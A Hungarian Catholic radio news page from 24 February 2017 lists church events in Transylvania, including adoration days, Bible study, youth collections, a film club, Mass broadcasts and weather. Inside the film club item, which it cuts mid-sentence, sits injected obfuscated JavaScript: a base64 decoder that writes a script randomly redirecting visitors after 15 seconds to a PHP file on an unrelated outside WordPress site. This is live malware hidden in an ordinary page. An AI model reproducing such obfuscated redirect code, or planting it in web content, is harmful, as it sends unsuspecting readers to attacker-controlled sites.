2017. február 24. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap 
A gyulafehérvári főegyházmegyében a holnapi nap folyamán Dicsőszentmártonban tartják az örökös szentségimádási napot. Éljünk minél többen a lehetőséggel, járuljunk az Oltáriszentségben jelen levő Krisztus elé, és könyörögjünk családjainkért, a békéért és a lelkek megmentéséért.

A Biblia, mint forrás
A Szatmárnémeti Püspökség világiak irodája szervezésében holnap délelőtt tíz órától a Szentlélek templom Merk Mihály termében a Bibliát vizsgálják, abban Jézus megkísértését, ez alapján pedig a személyes kísértéseket. A történet felolvasását követően a résztvevők magyarázatot kapnak Vojtku László plébánostól a kísértés fogalmára, majd különböző információ-feldolgozó módszereket alkalmaznak, beszélgetés indul, hogy az üzeneteket minél hatékonyabban magukévá tehessék. A bibliás programra várnak minden érdeklődőt.

Imanap Szovátán
„Nem szégyellem ugyanis az evangéliumot, hiszen Isten Üdvösséget hozó ereje minden hívőnek” mottóval imanapot szervez a szovátai katolikus imaközösség holnap délelőtt tíz órától a helyi kultúrotthonban. Az imanap szentségimádással, illetve szentmisével zárul. 

Előadássorozat a lazaristákról Nagyváradon
A lazaristák idén ünneplik születésüknek 400. évfordulóját. A nagyváradi Szent Katalin Telepi plébánián előadássorozat keretében ismertetik a rendet, az alapítót és a vincés lelkiséget. Az első előadás alkalmával holnap este hét órától Bényei Botond nagyváradi születésű lazarista atya a rend alapítóját, Páli Szent Vincét mutatja be és hozza közelebb a mai ember számára. Várnak minden érdelődőt.

Gyűjtés az ifjúsági pasztoráció támogatására
A Gyulafehérvári Főegyházmegyében farsang utolsó vasárnapja az ifjúság napja. Az ifjúsági pasztorációs tevékenységek támogatására február 26-án, a Főegyházmegye templomaiban gyűjtés lesz.

Remeteszegi filmklub
Közös filmnézésre hívják a marosvásárhelyieket vasárnap délután négy órára a Szent Család közösségi házba. Elsőként a Jákob rabbi kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andjai című film kerül vetítésre, melyben garantált a sok kacagás, de a sok tanúlság is. A film korhatár nélkül megtekinthető, utána igény szerint lehet maradni kicsit beszélgetni a felvetett témákról. 

Fogadalmi triduum a nagyvárad-újvárosi plébániatemplomban
A 32 évig tartó török uralom alóli felszabadulás után, az 1693-ban újraalakított nagyváradi latin szertartású székeskáptalan fogadalmat tett, hogy hálaadásul és engesztelésül minden évben a farsangi időszak utolsó három napján szentségimádást és szentmisét tartanak, a Csáky Imre váradi bíboros, püspök által felépített új székesegyházban, a mostani Szent László templomban. Ennek megfelelően tartják a fogadalmi triduumot idén is február 26-28. között a nagyvárad-újvárosi plébániatemplomban: délután négy órakor szentségimádást, öt órakor pedig szentmisét. A lelkigyakorlatos szentmisék főcelebránsa és szónoka Bartal Károly Tamás O.Praem. ny. premontrei apát.

Újra lehet csatlakozni a Nők iskolájához 
A KALOT Egyesület várja a lányokat, nőket, asszonyokat a hagyományos Nők Iskolájába, ahol közösség-élménnyel és a mindennapi életet megkönnyítő ismeretekkel gazdagodnak. A képzés 12 héten át, minden hétfőn délután hat órától kezdődően kétórás interaktív foglalkozást tartalmaz a lelki élet, egészséges életmód, nevelés, gondozás, külső és belső megújulás, háziasszonyi teendők és egyéb témakörökben. Érdeklődni és jelentkezni a 0758–840279-es telefonszámon, vagy az iroda@kalot.ro e-mail címen lehet hétköznapokon 8-12 óra között.

Hétvégi szentmiseközvetítések
Holnap, a megszokott időben, reggel nyolc órától hallhatják a szentmisét a székelyudvarhelyi Kis Szent Teréz plébániatemplomból. Vasárnap két szentmisét közvetítünk szintén Székelyudvarhelyről: déli fél tizenkettőtől, valamint este fél hét órától.

Időjárás: Egy hidegfront hatására ismét lehülésre kell készülni különösen az erdélyi medence térségében. Többfelé eső, havas eső, a hegyekben havazás is előfordulhat. Megerősödik az északnyugati szél. A fagyos reggelt követően, napközben 4-9 fokot mérhetünk. 

MRE - Hírszolgálat, 2017. február 24.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Csöbben, Bordos filiájában tartják az örökös szentségimádási napot. Éljünk minél többen a lehetőséggel, járuljunk az Oltáriszentségben jelen levő Krisztus elé, és könyörögjünk családjainkért, a békéért és a lelkek megmentéséért.

Belső Iránytű Gyergyószentmiklóson
A Belső Iránytű programsorozat keretében ma este hét órától Péter György, a Gyulafehérvári Caritas szocio-medikális ágazati igazgatója Kinaesthetics – tudatos mozgás és életminőség címmel tart előadást a gyergyószentmiklósi Szent István Plébánia nagytermében.

A Biblia, mint forrás
A Szatmárnémeti Püspökség világiak irodája szervezésében február 25-én, szombaton délelőtt tíz órától a Szentlélek templom Merk Mihály termében a Bibliát vizsgálják, abban Jézus megkísértését, ez alapján pedig a személyes kísértéseket. A történet felolvasását követően a résztvevők magyarázatot kapnak Vojtku László plébánostól a kísértés fogalmára, majd különböző információ-feldolgozó módszereket alkalmaznak, beszélgetés indul, hogy az üzeneteket minél hatékonyabban magukévá tehessék. A bibliás programra várnak minden érdeklődőt.

Imanap Szovátán
„Nem szégyellem ugyanis az evangéliumot, hiszen Isten Üdvösséget hozó ereje minden hívőnek" mottóval imanapot szervez a szovátai katolikus imaközösség február 25-én, szombaton délelőtt tíz órától a helyi kultúrotthonban. Az imanap szentségimádással, illetve szentmisével zárul.

Gyűjtés az ifjúsági pasztoráció támogatására
A Gyulafehérvári Főegyházmegyében farsang utolsó vasárnapja az ifjúság napja. Az ifjúsági pasztorációs tevékenységek támogatására február 26-án, a Főegyházmegye templomaiban gyűjtés lesz.

Toborzás a virágvasárnapi passiójátékra Kolozsváron
A kolozsvári fiatalok passiójátékot hirdetnek, virágvasárnapi, április 9-ei bemutatóval. Ha bárki úgy gondolja, hogy szívesen részt vállalna ebben a misztériumjátékban, várják jelentkezését február 26-ig Lőrincz Beátánál a 0746-363191-es telefonszámon vagy a viragvasarnapipassio@gmail.com e-mail címen. Az első találkozó február 27-én lesz.

Böjte Csaba Nagybányán
Február 26-án, vasárnap Böjte Csaba OFM Nagybányán, a veresvízi Krisztus Király templomban délelőtt tíz órától szentmisét mutat be. A szentmise keretén belül gyűjtésre kerül sor a Dévai Szent Ferenc Alapítvány megsegítésére, valamint megvásárolhatóak lesznek a Csaba testvér által írt könyvek is, melyeket kérésre a helyszínen dedikálni fog. Ezt követően a nagyszalontai Béke Királynője Gyermekvédelmi Központ lakói előadják Szent Erzsébet életét.

Módszertani képzés Csíksomlyón
„Hogyan olvassuk a Szentírást?” mottóval módszertani képzést szervez a Katolikus Magyar Bibliatársulat Csíksomlyón, a Jakab Antal Tanulmányi Házban március 3-5 között – tudtuk meg a romkat.ro oldalról. Jelentkezni február 28-ig lehetséges a benczedikati@hotmail.com email címen, vagy a 0745-593390-es telefonszámon (15 óra után).

FITT – Ferences ifjúsági téli találkozó
Márciu 3-5 között rendezik meg a ifjúsági téli találkozót a dési ferences kolostorban. Bővebb információk, illetve jelentkezés a 0746774701-es telefonszámon, Tibor testvérnél.

Rövid terápiás foglalkozás szenvedélybetegeknek
A Bonus Pastor Alapítvány rövid terápiás foglalkozást szervez alkohol-, drog-, játékfüggők és egyéb szenvedélybetegséggel küzdők számára. A program március 6–17. között zajlik Mezőpanitban. A terápia lehetőség a szenvedélybetegséggel küzdők és családtagjaik számára a gyógyulásra és kapcsolataik rendezésére. A rövid távú terápián férfiak és nők, valamint felnőtt hozzátartozóik is részt vehetnek. Jelentkezni és a részletekről érdeklődni február 28-ig lehet. Mivel a helyek száma korlátozott, a résztvevőket jelentkezési sorrendben fogadják. Bővebb információk a www.bonuspastor.ro honlapon találhatók.

Időjárás: Ma eleinte még enyhe, szeles időre készülhetünk, majd a kora délutáni óráktól kezdve egyre többfelé kell esőre, záporokra számítani. Helyenként egy-egy zivatar is előfordulhat majd. Délnyugaton néhol jelentősebb mennyiségű csapadék is hullhat. A déli órákban még 8-13 fokot mérhetünk, de délután visszaesik a hőmérséklet.

MRE - Hírszolgálat, 2017. február 24.

About the author

maradmin

Leave a Comment